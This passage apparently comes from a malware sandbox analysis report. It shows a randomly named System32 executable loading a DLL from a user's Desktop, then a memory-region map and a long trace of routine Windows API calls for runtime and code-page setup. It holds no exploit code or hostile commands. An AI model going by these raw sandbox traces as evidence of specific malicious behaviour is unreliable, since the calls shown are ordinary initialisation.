/fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1558 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1559 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1560 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1561 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1562 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1563 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1564 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1565 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1566 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1567 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1568 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1569 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1570 start_va = 0x300000 end_va = 0x366fff entry_point = 0x300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1571 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1572 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1573 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1574 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1575 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1576 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1577 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1578 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1579 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1580 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1581 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1582 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1583 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1584 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1585 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1586 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1587 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1588 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1589 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1590 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1591 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1592 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1593 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1594 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1595 start_va = 0x440000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1596 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1597 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1598 start_va = 0x600000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Thread: id = 74 os_tid = 0xc00 [0033.465] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb14 | out: lpSystemTimeAsFileTime=0x1afb14*(dwLowDateTime=0xe1a26dd0, dwHighDateTime=0x1d3dfba)) [0033.465] GetCurrentProcessId () returned 0xbfc [0033.465] GetCurrentThreadId () returned 0xc00 [0033.465] GetTickCount () returned 0x1780c [0033.465] QueryPerformanceCounter (in: lpPerformanceCount=0x1afb0c | out: lpPerformanceCount=0x1afb0c*=367427385) returned 1 [0033.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.466] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.466] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.466] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.466] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.466] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.467] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.467] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.467] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.467] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.467] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.467] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.468] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.468] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.468] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.468] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.468] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.468] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.468] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.468] GetCurrentThreadId () returned 0xc00 [0033.468] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"DefaultInstall\"" [0033.468] GetEnvironmentStringsW () returned 0x217900* [0033.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x4b09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.469] FreeEnvironmentStringsW (penv=0x217900) returned 1 [0033.469] GetStartupInfoA (in: lpStartupInfo=0x1afa64 | out: lpStartupInfo=0x1afa64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.469] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.469] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.469] SetHandleCount (uNumber=0x20) returned 0x20 [0033.469] GetLastError () returned 0x0 [0033.469] SetLastError (dwErrCode=0x0) [0033.469] GetLastError () returned 0x0 [0033.469] SetLastError (dwErrCode=0x0) [0033.469] GetLastError () returned 0x0 [0033.469] SetLastError (dwErrCode=0x0) [0033.469] GetACP () returned 0x4e4 [0033.469] GetLastError () returned 0x0 [0033.469] SetLastError (dwErrCode=0x0) [0033.469] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.469] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1afa44 | out: lpCPInfo=0x1afa44) returned 1 [0033.469] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1af510 | out: lpCPInfo=0x1af510) returned 1 [0033.470] GetLastError () returned 0x0 [0033.470] SetLastError (dwErrCode=0x0) [0033.470] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1af4a0 | out: lpCharType=0x1af4a0) returned 1 [0033.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af924, cbMultiByte=256, lpWideCharStr=0x1af288, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.470] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1af524 | out: lpCharType=0x1af524) returned 1 [0033.470] GetLastError () returned 0x0 [0033.470] SetLastError (dwErrCode=0x0) [0033.470] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af924, cbMultiByte=256, lpWideCharStr=0x1af258, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ해矲狰Ā") returned 256 [0033.470] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ해矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.470] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ해矲狰Ā", cchSrc=256, lpDestStr=0x1af048, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.470] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1af824, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0b\x10\x99ô\\ú\x1a", lpUsedDefaultChar=0x0) returned 256 [0033.470] GetLastError () returned 0x0 [0033.470] SetLastError (dwErrCode=0x0) [0033.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.470] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1af924, cbMultiByte=256, lpWideCharStr=0x1af278, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ해矲狰Ā") returned 256 [0033.470] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ해矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.470] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ해矲狰Ā", cchSrc=256, lpDestStr=0x1af068, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.470] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1af724, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 